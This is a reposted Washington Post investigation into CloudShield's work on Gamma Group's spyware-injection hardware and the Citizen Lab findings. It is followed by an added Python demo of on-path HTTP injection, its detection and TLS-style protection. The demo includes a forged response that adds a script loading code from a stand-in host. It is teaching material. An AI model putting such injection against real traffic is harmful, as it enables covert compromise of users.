{"id":46263,"date":"2014-08-18T12:00:20","date_gmt":"2014-08-18T11:00:20","guid":{"rendered":"https:\/\/www.transcend.org\/tms\/?p=46263"},"modified":"2015-05-05T21:30:43","modified_gmt":"2015-05-05T20:30:43","slug":"u-s-firm-helped-the-spyware-industry-build-a-potent-digital-weapon-for-sale-overseas","status":"publish","type":"post","link":"https:\/\/www.transcend.org\/tms\/2014\/08\/u-s-firm-helped-the-spyware-industry-build-a-potent-digital-weapon-for-sale-overseas\/","title":{"rendered":"U.S. Firm Helped the Spyware Industry Build a Potent Digital Weapon for Sale Overseas"},"content":{"rendered":"<p><em>15 Aug 2014 &#8211; <\/em>CloudShield Technologies, a California defense contractor, dispatched a senior engineer to Munich in the early fall of 2009. His instructions were unusually opaque.<\/p>\n<p>As he boarded the flight, the engineer told confidants later, he knew only that he should visit a German national who awaited him with an off-the-books assignment. There would be no written contract, and on no account was the engineer to send reports back to CloudShield headquarters.<\/p>\n<p>His contact, Martin J. Muench, turned out to be a former developer of computer security tools who had long since turned to the darkest side of their profession. 
Gamma Group, the British conglomerate for which Muench was a managing director, built and sold systems to break into computers, seize control clandestinely, and then copy files, listen to Skype calls, record every keystroke and switch on Web cameras and microphones at will.<\/p>\n<p>According to accounts the engineer gave later and contemporary records obtained by The Washington Post, he soon fell into a shadowy world of lucrative spyware tools for sale to foreign security services, some of them with records of human rights abuse.<\/p>\n<div id=\"attachment_46264\" style=\"width: 616px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/www.transcend.org\/tms\/wp-content\/uploads\/2014\/08\/spywaregraphic1-malaware-spying-surveillance.jpg\" ><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-46264\" class=\"size-full wp-image-46264\" src=\"https:\/\/www.transcend.org\/tms\/wp-content\/uploads\/2014\/08\/spywaregraphic1-malaware-spying-surveillance.jpg\" alt=\"(Willow Brugh\/A diagram explaining the exploitation of YouTube users.)\" width=\"606\" height=\"400\" srcset=\"https:\/\/www.transcend.org\/tms\/wp-content\/uploads\/2014\/08\/spywaregraphic1-malaware-spying-surveillance.jpg 606w, https:\/\/www.transcend.org\/tms\/wp-content\/uploads\/2014\/08\/spywaregraphic1-malaware-spying-surveillance-300x198.jpg 300w\" sizes=\"auto, (max-width: 606px) 100vw, 606px\" \/><\/a><p id=\"caption-attachment-46264\" class=\"wp-caption-text\">(Willow Brugh\/A diagram explaining the exploitation of YouTube users.)<\/p><\/div>\n<p>Over several months, the engineer adapted Gamma\u2019s digital weapons to run on his company\u2019s specialized, high-speed network hardware. 
Until then CloudShield had sold its <a target=\"_blank\" href=\"http:\/\/www.cloudshield.com\/products\/platforms\/cs-2000.asp\" >CS-2000 device<\/a>, a multipurpose network and content processing product, primarily to the Air Force and other Pentagon customers, who used it to manage and defend their networks, not to attack others.<\/p>\n<p>CloudShield\u2019s central role in Gamma\u2019s controversial work \u2014 fraught with legal risk under U.S. export restrictions \u2014 was first uncovered by Morgan Marquis-Boire, author of <a target=\"_blank\" href=\"https:\/\/citizenlab.org\/2014\/08\/cat-video-and-the-death-of-clear-text\/\" >a new report<\/a> released Friday by the Citizen Lab at the University of Toronto\u2019s Munk School of Global Affairs. He shared advance drafts with The Post, which conducted its own month-long investigation.<\/p>\n<p>The prototype that CloudShield built was never brought to market, and the company parted ways with Gamma in 2010. But Marquis-Boire said CloudShield\u2019s work helped pioneer a new generation of \u201cnetwork injection appliances\u201d sold by Gamma and its Italian rival, Hacking Team. Those devices harness malicious software to specialized equipment attached directly to the central switching points of a foreign government\u2019s national Internet grid.<\/p>\n<p>The result: Merely by playing a YouTube video or visiting a Microsoft Live service page, for instance, an unknown number of computers around the world have been implanted with Trojan horses by government security services that siphon their communications and files. Google, which owns YouTube, and Microsoft are racing to close the vulnerability.<\/p>\n<p>Citizen Lab\u2019s new report, based on leaked technical documents, is the first to document that commercial spyware companies are making active use of this technology. 
Network injection allows products built by Gamma and Hacking Team to insert themselves into an Internet data flow and change it undetectably in transit.<\/p>\n<p>The report calls that \u201chacking on easy mode,\u201d in which \u201ccompromising a target becomes as simple as waiting for the user to view unencrypted content on the Internet.\u201d<\/p>\n<p>Attacks of that kind were the stuff of hacker imaginings until this year, when news accounts based on documents provided by former National Security Agency contractor Edward Snowden described a somewhat similar NSA program code-named QUANTUMINSERT.<\/p>\n<p><a href=\"https:\/\/www.transcend.org\/tms\/wp-content\/uploads\/2014\/08\/spywaregraphic2-malaware-spying-surveillance.jpg\" ><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-46265 size-full\" src=\"https:\/\/www.transcend.org\/tms\/wp-content\/uploads\/2014\/08\/spywaregraphic2-malaware-spying-surveillance.jpg\" alt=\"(Willow Brugh\/A diagram explaining the exploitation of YouTube users.)\" width=\"587\" height=\"555\" srcset=\"https:\/\/www.transcend.org\/tms\/wp-content\/uploads\/2014\/08\/spywaregraphic2-malaware-spying-surveillance.jpg 587w, https:\/\/www.transcend.org\/tms\/wp-content\/uploads\/2014\/08\/spywaregraphic2-malaware-spying-surveillance-300x283.jpg 300w\" sizes=\"auto, (max-width: 587px) 100vw, 587px\" \/><\/a><\/p>\n<p>\u201cIt has been generally assumed that the best funded spy agency in the world would possess advanced capability,\u201d the Citizen Lab report says. \u201cWhat is perhaps more surprising is that this capability is being developed by Western vendors for sale on the commercial market.\u201d<\/p>\n<p>Hacking Team and the company that now owns CloudShield denied any wrongdoing. Messages left with Gamma went unreturned.<\/p>\n<p>The \u201ccustom payload\u201d that Hacking Team uses to compromise YouTube injects malicious code into the video stream when a visitor clicks the play button. 
The user sees the \u201ccute animal videos\u201d he expects, according to Citizen Lab, but the malicious code exploits a flaw in Adobe\u2019s Flash video player to take control of the computer.<\/p>\n<p>Another attack, custom-built for use on Microsoft pages, uses Oracle\u2019s Java technology, another common browser component, to insert a back door into a victim\u2019s computer.<\/p>\n<p>Security and privacy advocates have identified those vulnerabilities before, but the two companies regarded them as hypothetical. In response to a bug report in September 2012, which warned of a potential YouTube attack, Google\u2019s security team responded that the use of unencrypted links to send video \u201cis expected behavior.\u201d <a target=\"_blank\" href=\"https:\/\/code.google.com\/p\/gdata-issues\/issues\/detail?id=2964&amp;can=1&amp;q=youtube%20https&amp;colspec=API%20ID%20Type%20Status%20Priority%20Stars%20Summary\" >Google closed the discussion <\/a>with the tag \u201cWontFix.\u201d<\/p>\n<p><strong>\u2018Against our will\u2019<\/strong><\/p>\n<p>After Marquis-Boire disclosed to them confidentially last month that their services are under active attack, Google and Microsoft began racing to close security holes in networks used by hundreds of millions of users.<\/p>\n<p>\u201cI want to be sure there\u2019s no technical means for people to take a user\u2019s data against our will,\u201d Eric Grosse, Google\u2019s vice president for security engineering, said in an interview. \u201cIf they want to do that, they need to use legal means and we pursue that.\u201d<\/p>\n<p>Google and Microsoft executives said they are accelerating previous plans to encrypt their links to users across a wider range of their services. Encryption scrambles e-mail, stored files, video and other content as it travels from their servers to a user\u2019s computer or mobile device. 
That step, as far as security engineers know, effectively prevents most attacks in current use.<\/p>\n<p>Since learning of Marquis-Boire\u2019s findings in mid-July, Google has encrypted a \u201clarge majority\u201d of YouTube video links, and Microsoft has changed default settings to prevent unencrypted log-ins on most <a target=\"_blank\" href=\"https:\/\/login.live.com\/login.srf?wa=wsignin1.0&amp;rpsnv=12&amp;ct=1408124784&amp;rver=6.4.6456.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&amp;lc=1033&amp;id=64855&amp;mkt=en-us&amp;cbcxt=mai&amp;snsc=1\" >live.com<\/a> services.<\/p>\n<p>\u201cThere\u2019s a lot of products to update so we\u2019re not at 100 percent yet but we\u2019re actively engaged with all the teams,\u201d Grosse said, acknowledging that Google Maps, Google Earth and other services still connect to users in ways that can easily be intercepted.<\/p>\n<p>Grosse said comprehensive use of encryption should now be regarded as a basic responsibility of Internet services to their users.<\/p>\n<p>\u201cWe\u2019re probably already [encrypted] to a sufficiently high level that I would guess our adversaries are already having to scramble and shift to some other widely-used service that has not gone to SSL,\u201d he said, referring to a form of encryption called the secure socket layer, which is indicated by a padlock icon on some browsers.<\/p>\n<p>Matt Thomlinson, Microsoft\u2019s vice president of security, said in a statement that his company \u201cwould have significant concerns if the allegations of an exploit being deployed are true.\u201d<\/p>\n<p>\u201cWe have been rolling out advanced security across our web properties to continue to help protect our customers,\u201d he added.<\/p>\n<p>In computer circles, any unencrypted data is known as \u201ccleartext.\u201d Marquis-Boire, expanding on a theme that other security researchers have emphasized since disclosures of National Security Agency programs began 14 months ago, said 
\u201cthe big take-away is that cleartext is just dead.\u201d<\/p>\n<p>\u201cUnencrypted traffic is untrustworthy,\u201d he said. \u201cI would describe this as a sad reality of today\u2019s Internet. The techno-Utopian, libertarian ideology of the \u201990s didn\u2019t foresee that the Internet would be as militarized as it is now. People with authority and power have decided to reserve the right to \u2018own\u2019 Internet users at the core. So in order to be safe you need to walk around everywhere wrapped in encryption.\u201d<\/p>\n<p><strong>\u2018Lawful intercept\u2019<\/strong><\/p>\n<p>The computer exploitation industry markets itself to foreign government customers in muscular terms. One Gamma brochure made public by WikiLeaks described its malware injection system, called FinFly ISP, as a <a target=\"_blank\" href=\"https:\/\/wikileaks.org\/spyfiles\/files\/0\/297_GAMMA-201110-FinFly_ISP.pdf\" >\u201cstrategic, countrywide\u201d solution <\/a>with nearly unlimited \u201cscalability,\u201d or capacity for expansion. Hacking Team, similarly, says it provides \u201c<a target=\"_blank\" href=\"http:\/\/hackingteam.it\/index.php\/about-us\" >effective, easy-to-use offensive technology <\/a>to the worldwide law enforcement and intelligence communities.\u201d<\/p>\n<p>In rare comments to the general public, the companies use the term \u201clawful intercept\u201d to describe their products and say they do not sell to customers on U.S., European or U.N. black lists.<\/p>\n<p>\u201cOur software is designed to be used and is used to target specific subjects of investigation,\u201d said Eric Rabe, a U.S.-based spokesman for Hacking Team, in an extended e-mail interview. 
\u201cIt is not designed or used to collect data from a general population of a city or nation.\u201d<\/p>\n<p>He declined to discuss details of the Citizen Lab report, which is based in part on internal company documents leaked to Marquis-Boire, but he appeared to acknowledge indirectly that the material was authentic.<\/p>\n<p>\u201cWe believe the ongoing Citizen Lab efforts to disclose proprietary Hacking Team information is misguided, because, if successful for Citizen Lab, it not only harms our business but also gives the advantage to criminals and terrorists,\u201d he said.<\/p>\n<p>CloudShield\u2019s founder, Peder Jungck, who oversaw the company\u2019s relationship with Gamma before departing for a job with the British defense giant BAE Systems, did not respond to requests for comment.<\/p>\n<p>Confidants of the CloudShield engineer, who has since left the company after becoming disillusioned with its surveillance work, identified him as Eddy Deegan, a British citizen. Deegan\u2019s LinkedIn profile says he worked for the company as a professional services engineer during the period in question. Reached by telephone in France, Deegan declined to confirm or deny the identity of his external customer in late 2009.<\/p>\n<p>\u201cNothing came of the work I was involved in at the time,\u201d he said. \u201cI asked, and was assured that nothing illegal was undertaken. I have no further comment.\u201d<\/p>\n<p>U.S. export restrictions, enforced by the Commerce Department, require a license for any foreign sale of technology described <a target=\"_blank\" href=\"http:\/\/www.law.cornell.edu\/uscode\/text\/18\/2512\" >in the relevant statute<\/a> as \u201cprimarily useful for the purpose of the surreptitious interception of wire, oral, or electronic communications.\u201d<\/p>\n<p>Jennifer Gephart, the media relations director for Leidos, which now owns CloudShield, declined to say whether the company had applied for an export license for the Gamma project. 
The transactions in question took place \u201cprior to our company\u2019s acquisition of CloudShield,\u201d she said, but \u201cto our knowledge\u201d they were \u201chandled in accordance with applicable regulations.\u201d<\/p>\n<p>Gephart confined her statement to the sale of CloudShield\u2019s CS-2000 hardware. When asked about the company\u2019s development of custom software to turn the device into a spyware delivery system, she declined to respond.<\/p>\n<p>Robert Clifton Burns, who specializes in export controls at the law firm Bryan Cave, said that \u201csurreptitious listening devices are covered and the software for that is also covered on the Commerce Control List.\u201d<\/p>\n<p>The regulations are complex and inconsistent, he said, and an authoritative legal judgment would require more facts. CloudShield might argue, he said, that malware injection is not \u201cprimarily useful\u201d for surreptitious eavesdropping because it can also be used to track a target\u2019s location, take photographs or steal electronic files. Although more intrusive, those attacks were not covered under the rules that applied in 2009.<\/p>\n<p>The Gamma Group lists no e-mail address or telephone number on its Web site. No one responded to a lengthy note left on the company\u2019s \u201cContact\u201d page.<\/p>\n<p>Muench, who has left his old job for a new position in France, read a LinkedIn message requesting an interview. He did not respond. In the past he has dismissed human rights concerns as unproven and defended Gamma\u2019s products as vital for saving innocent lives. 
\u201cThe most frequent fields of use are against pedophiles, terrorists, organized crime, kidnapping and human trafficking,\u201d he <a target=\"_blank\" href=\"http:\/\/bits.blogs.nytimes.com\/2012\/08\/16\/company-denies-role-in-recently-uncovered-spyware\/?_php=true&amp;_type=blogs&amp;_php=true&amp;_type=blogs&amp;_r=1\" >told the New York Times<\/a> two years ago.<\/p>\n<p>Security researchers have documented clandestine sales of Gamma and Hacking Team products to \u201csome of the world\u2019s most notorious abusers of human rights,\u201d said Ron Deibert, the director of Citizen Lab, a list that includes Turkmenistan, Egypt, Bahrain and Ethiopia.<\/p>\n<p>At CloudShield, executives knew the identity of at least one prospective customer for the system Deegan built. A former manager told The Post, with support from records obtained elsewhere, that CloudShield sent Deegan to Oman to plan a deployment for one of the country\u2019s internal security services. The sale did not go through.<\/p>\n<p>In its annual assessment of human rights that year, the <a target=\"_blank\" href=\"http:\/\/www.state.gov\/j\/drl\/rls\/hrrpt\/2010\/nea\/154470.htm\" >State Department reported<\/a> that Oman \u201cmonitored private communications\u201d without legal process in order to \u201csuppress criticism of government figures and politically objectionable views.\u201d<\/p>\n<p><strong>\u2018A push market\u2019<\/strong><\/p>\n<p>CloudShield did not see itself as a cloak and dagger company. It made its name for high-end hardware that could peer deeply into Internet traffic and pull out and analyze \u201cpackets\u201d of data as they flew by.<\/p>\n<p>The flagship product five years ago, the CS-2000, could not only look inside the data flow, but select parts of it to copy or reroute. 
That made it a good tool for filtering out unwanted data or blocking certain forms of cyberattack.<\/p>\n<p>But hardware that could block data selectively could also rewrite innocent traffic to include malicious code. That meant the CloudShield product could be used for attack as well as defense, a former executive said.<\/p>\n<p>CloudShield began pitching its product for offensive use, focusing on U.S. customers because of export controls.<\/p>\n<p>\u201cThe basic motivations are pretty straightforward,\u201d said one former senior manager there. \u201cIt was a push market. We were trying to sell boxes. It was a very conscious effort to target lawful intercept as a space where you could legitimately apply these kinds of technologies.\u201d<\/p>\n<p>Two former employees said that Muench, the Gamma executive, traveled to Sunnyvale in 2009 in hopes of striking a business relationship. Jungck, CloudShield\u2019s founder and chief technology officer, said he could not export that kind of technology and sent Muench home.<\/p>\n<p>But the leadership team reconsidered, and hit upon a plan. They believed that Deegan could do the work for Gamma without triggering U.S. export controls as long as CloudShield\u2019s U.S. operations had nothing to do with it.<\/p>\n<p>\u201cI think we all had qualms in the beginning,\u201d said one former executive who took part in the deliberations. \u201cI think we rationalized a way in which we felt comfortable with it. Part of that rationalization was to keep it outside the U.S., limit it to that environment where that project was.\u201d<\/p>\n<p>What first appeared as an absorbing technical challenge for Deegan began to take a darker cast. His prototype system could inject any of \u201c254 trojans,\u201d or all of them, into a targeted computer. If it failed once, it would keep trying, up to 65,000 times.<\/p>\n<p>He was proud of his technical accomplishments, he told confidants, but was no longer sure he had done the right thing. 
After meeting prospective customers in Oman, his qualms grew worse.<\/p>\n<p>In the end, the Oman deal fell through, and other efforts, with other partners failed, too. CloudShield and Gamma parted ways, and Gamma found another hardware supplier. Deegan\u2019s prototype, according to Marquis-Boire and a CloudShield insider, may have sped development of the flagship surveillance product that Gamma <a target=\"_blank\" href=\"https:\/\/wikileaks.org\/spyfiles\/files\/0\/297_GAMMA-201110-FinFly_ISP.pdf\" >brought to market the following year<\/a>.<\/p>\n<p><strong><em><a target=\"_blank\" href=\"http:\/\/apps.washingtonpost.com\/g\/page\/world\/how-to-implant-a-trojan-horse-a-user-manual\/1257\/\" >[Read: How to implant a Trojan Horse: a user manual]<\/a> <\/em><\/strong><\/p>\n<p>_______________________________<\/p>\n<p><em>Julie Tate contributed to this report.<\/em><\/p>\n<p><em>Barton Gellman writes for the national staff. He has contributed to three Pulitzer Prizes for The Washington Post, most recently the 2014 Pulitzer Prize for Public Service.<\/em><\/p>\n<p><em>\u00a0<\/em><a target=\"_blank\" href=\"http:\/\/www.washingtonpost.com\/world\/national-security\/spyware-tools-allow-buyers-to-slip-malicious-code-into-youtube-videos-microsoft-pages\/2014\/08\/15\/31c5696c-249c-11e4-8593-da634b334390_story.html?hpid=z1\" >Go to Original \u2013 washingtonpost.com<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>His contact turned out to be a former developer of computer security tools who had long since turned to the darkest side of their profession, built and sold systems to break into computers, seize control clandestinely, and then copy files, listen to Skype calls, record every keystroke and switch on Web cameras and microphones at will; a shadowy world of lucrative spyware tools for sale to foreign security services with records of human rights 
abuse.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[60],"tags":[],"class_list":["post-46263","post","type-post","status-publish","format-standard","hentry","category-whistleblowing-surveillance"],"_links":{"self":[{"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/posts\/46263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/comments?post=46263"}],"version-history":[{"count":0,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/posts\/46263\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/media?parent=46263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/categories?post=46263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.transcend.org\/tms\/wp-json\/wp\/v2\/tags?post=46263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
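<p>The mechanism the article describes in its middle section (an appliance at a network choke point inserting itself into a cleartext HTTP flow and changing it in transit), the reason transport encryption defeats it, and the one passive check a network defender can run against it can all be shown in a single short program. What follows is an added example written for this page; it is not code from CloudShield, Gamma, Hacking Team or Citizen Lab, and it does not reproduce any Flash or Java payload. The TCP segments, HTTP responses and addresses are constructed inline (documentation ranges), the HMAC tag stands in for the integrity protection a TLS record layer provides, and the duplicate-sequence-number heuristic is the check Fox-IT later published for spotting QUANTUMINSERT-style injection, not something the article itself describes.</p>

```python
"""On-path injection into cleartext HTTP, its passive detection, and why TLS stops it.

Added example for this page, not vendor code. All traffic below is constructed.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

TAG_LEN = 32  # bytes of HMAC-SHA256 output appended by protect()


@dataclass(frozen=True)
class Segment:
    """Minimal view of a TCP segment carrying HTTP data."""
    flow: str       # 4-tuple collapsed to a string, e.g. "10.0.0.5:49152->203.0.113.10:80"
    seq: int        # sequence number of the first payload byte
    payload: bytes


def http_response(body: bytes, content_type: str = "text/html") -> bytes:
    """Build the cleartext HTTP/1.1 200 response an origin server would send."""
    head = (
        "HTTP/1.1 200 OK\r\n"
        f"Content-Type: {content_type}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode("ascii") + body


def inject(legit: Segment, new_body: bytes) -> Segment:
    """Model of a network-injection appliance.

    It watches the request go by and emits a forged response on the same flow
    with the same sequence number before the real server's answer arrives. A
    correct Content-Length for the substituted body keeps the response
    well-formed, so the browser has nothing to object to.
    """
    return Segment(legit.flow, legit.seq, http_response(new_body))


def client_receive(on_wire: List[Segment]) -> bytes:
    """A client's TCP stack: the first segment seen for (flow, seq) is delivered;
    a later copy with the same sequence number looks like a retransmission and is dropped."""
    delivered: Dict[Tuple[str, int], bytes] = {}
    for seg in on_wire:
        delivered.setdefault((seg.flow, seg.seq), seg.payload)
    return b"".join(delivered.values())


def detect_injection(on_wire: List[Segment]) -> List[Tuple[str, int]]:
    """Passive detection from a network tap: two segments on one flow carrying the
    same sequence number but different bytes. A genuine retransmission repeats
    the same bytes, so differing bytes mean a second sender is on the path."""
    first: Dict[Tuple[str, int], bytes] = {}
    alerts: List[Tuple[str, int]] = []
    for seg in on_wire:
        key = (seg.flow, seg.seq)
        if key in first and first[key] != seg.payload:
            alerts.append(key)
        first.setdefault(key, seg.payload)
    return alerts


def protect(payload: bytes, key: bytes) -> bytes:
    """Stand-in for TLS record protection: append an HMAC over the bytes.
    Real TLS also encrypts; what matters here is that an injector without the
    session key cannot produce a tag the client will accept."""
    return payload + hmac.new(key, payload, hashlib.sha256).digest()


def verify(protected: bytes, key: bytes) -> Optional[bytes]:
    """Return the payload if its tag checks out, else None (the client drops it)."""
    body, tag = protected[:-TAG_LEN], protected[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    return body if hmac.compare_digest(tag, expected) else None


def demo() -> dict:
    """Run the cleartext and the protected scenario and report what each side sees."""
    flow = "10.0.0.5:49152->203.0.113.10:80"  # constructed, documentation addresses
    page = b"<html><body><video src=\"cat.mp4\"></video></body></html>"
    evil_page = page.replace(
        b"</body>", b"<script src=\"http://203.0.113.99/loader.js\"></script></body>")

    legit = Segment(flow, 1000, http_response(page))
    forged = inject(legit, evil_page)
    cleartext_wire = [forged, legit]          # the appliance wins the race
    received = client_receive(cleartext_wire)

    key = b"session key known only to the two endpoints"  # constructed
    protected_legit = Segment(flow, 1000, protect(legit.payload, key))
    protected_forged = inject(protected_legit, evil_page)  # injector has no key
    return {
        "client_got_injected_script": b"loader.js" in received,
        "alerts": detect_injection(cleartext_wire),
        "retransmission_alerts": detect_injection([legit, legit]),
        "protected_legit_accepted": verify(protected_legit.payload, key) == legit.payload,
        "protected_forged_accepted": verify(protected_forged.payload, key) is not None,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

<p>Two points to take from running it. The client in the cleartext case receives a well-formed page with an extra script tag and has no way to prefer the server's copy, which is exactly why the article's sources say cleartext is untrustworthy. The tap-side check, on the other hand, needs no key at all: it only has to notice that two different payloads claimed the same sequence number, which a real retransmission never does. In production the same idea is applied to packet captures at the edge, with the usual care about TCP segmentation offload and middleboxes that legitimately rewrite segments.</p>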